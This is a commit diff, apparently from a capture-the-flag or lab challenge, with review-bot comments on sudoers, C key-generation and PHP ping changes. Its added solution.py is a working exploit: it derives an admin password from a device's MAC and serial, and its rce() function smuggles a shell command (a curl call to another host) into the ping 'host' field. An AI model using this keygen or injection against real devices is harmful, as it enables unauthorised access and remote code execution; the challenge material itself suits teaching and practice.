sudo env_keep fix; added chown for keygen: update_key; utils.php ping down to 2

Giulio 2020-09-20 19:15:00 +02:00
parent ee77cf25db
commit 6dd0aadd0d
4 changed files with 44 additions and 4 deletions


@ -1,5 +1,5 @@
Defaults env_reset Defaults env_reset
Defaults env_keep = "clearpassword" Defaults env_keep = "key"
Defaults mail_badpass Defaults mail_badpass
Defaults secure_path="/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin" Defaults secure_path="/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin"
Defaults logfile="/var/log/sudo.log" Defaults logfile="/var/log/sudo.log"
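Review bot: `env_keep = "key"` lets the invoking user pass an arbitrary value in the `key` environment variable to any command run through sudo, so whichever privileged program reads it has to treat that value as untrusted input. Using `=` rather than `+=` replaces the whole keep list, which is the stricter choice. The variable name is generic, so a comment naming its consumer would help the next maintainer, e.g. `# key: read by <program> for <purpose>`.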


@ -73,8 +73,7 @@ unsigned* md5(const char *msg, int mlen)
static short rot1[] = { 5, 9, 14, 20 }; static short rot1[] = { 5, 9, 14, 20 };
static short rot2[] = { 4, 11, 16, 23 }; static short rot2[] = { 4, 11, 16, 23 };
static short rot3[] = { 6, 10, 15, 21 }; static short rot3[] = { 6, 10, 15, 21 };
static short *rots[] = { rot0, rot1, rot2, rot3 static short *rots[] = { rot0, rot1, rot2, rot3 };
};
static unsigned kspace[64]; static unsigned kspace[64];
static unsigned * k; static unsigned * k;
@ -205,6 +204,7 @@ int gen_update_key()
{ {
system("/usr/bin/hexdump -n 32 -e '4/4 \"%08X\"' /dev/urandom > /etc/update_key"); system("/usr/bin/hexdump -n 32 -e '4/4 \"%08X\"' /dev/urandom > /etc/update_key");
} }
chown("/etc/update_key", 1001, 1002);
chmod("/etc/update_key", 0600); chmod("/etc/update_key", 0600);
} }
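Review bot: In `gen_update_key`, the shell redirection inside `system()` creates `/etc/update_key` with whatever mode the process umask allows, and the added `chown` and the existing `chmod(..., 0600)` only restrict it afterwards, so the key may be readable by other local users for a short window. Calling `umask(077);` before the `system()` call closes that window. The return values of `chown` and `chmod` are ignored, so a failure silently leaves the key with the wrong owner or mode; check them, e.g. `if (chown("/etc/update_key", 1001, 1002) != 0) return -1;` (or whatever error value this function uses), and give the numeric uid/gid named constants. The function begins above the hunk, so the surrounding condition is not visible here.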

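--- /dev/null
+++ b/solution/solution.py
@@ -0,0 +1,40 @@
+import requests
+import hashlib
+def xorshift(x, y, z, w):
+t = x
+t = t ^ ((t << 11) & 0xFFFFFFFF)
+t = t ^ (t >> 8)
+x, y, z = y, z, w
+w = (w ^ (w >> 19)) ^ t
+return x, y, z, w, t
+def keygen(mac, serial):
+l = 20
+password = ""
+md5a = hashlib.md5(mac).hexdigest()
+md5b = hashlib.md5(serial).hexdigest()
+w = int(md5a[0:8], 16)
+x = int(md5a[8:16], 16)
+y = int(md5a[16:24], 16)
+z = int(md5a[24:32], 16)
+for i in range(0, l):
+x, y, z, w, t = xorshift(x, y, z, w)
+password += md5b[t % 20]
+return password
+def rce(username, password, host, payload):
+requests.post("http://{}/utils.php".format(host), auth=auth(username, password), data={"action": "ping", "host": "127.0.0.1\n".format(payload.replace(' ', '${IFS}'))})
+def main():
+serial = "D7F2959E8EE66CC06CB67C0D2B835273".encode("ascii")
+mac = "ac:35:ee:ad:29:1b".encode("ascii")
+host = "192.168.77.1"
+payload = "curl 192.168.1.2:8080"
+password = keygen(mac, serial)
+print(password)
+#rce("admin", password, host, payload)
+main()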
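Review bot: `main()` is called unconditionally on the last line, so importing this module just to reuse `keygen` runs the whole script; guard it with `if __name__ == "__main__": main()`. `keygen` and `xorshift` have no docstrings saying which routine on the device they mirror, so the two implementations can drift apart unnoticed; a one-line docstring naming that routine would fix this. The script derives the password from the MAC address and serial number alone, which suggests the credential has no secret input; if that is the intended lesson of the challenge, a module docstring should state it as the root cause.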


@ -7,7 +7,7 @@ require_once("includes/nav.php");
if ($_SERVER['REQUEST_METHOD'] === 'POST' && ($_POST['action'] === 'ping' || $_POST['action'] === 'traceroute') && isset($_POST['host']) && !empty($_POST['host'])) { if ($_SERVER['REQUEST_METHOD'] === 'POST' && ($_POST['action'] === 'ping' || $_POST['action'] === 'traceroute') && isset($_POST['host']) && !empty($_POST['host'])) {
switch ($_POST['action']) { switch ($_POST['action']) {
case 'ping': case 'ping':
$cmd = '/bin/'.$_POST['action']. ' -c 4'; $cmd = '/bin/'.$_POST['action']. ' -c 2';
break; break;
case 'traceroute': case 'traceroute':
$cmd = '/usr/bin/'.$_POST['action']; $cmd = '/usr/bin/'.$_POST['action'];
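Review bot: The visible condition only checks that `$_POST['host']` is set and non-empty, while `$cmd` is being assembled for a shell; if the host is appended to `$cmd` further down (outside this hunk), it needs validating and quoting first. A check such as `filter_var($_POST['host'], FILTER_VALIDATE_IP)` (or a strict hostname pattern), followed by `escapeshellarg()` when the command is built, would reject values containing newlines or shell metacharacters. The `action` value is already constrained by the `===` comparisons, so concatenating it is safe, though writing the literal `'/bin/ping -c 2'` would make that obvious.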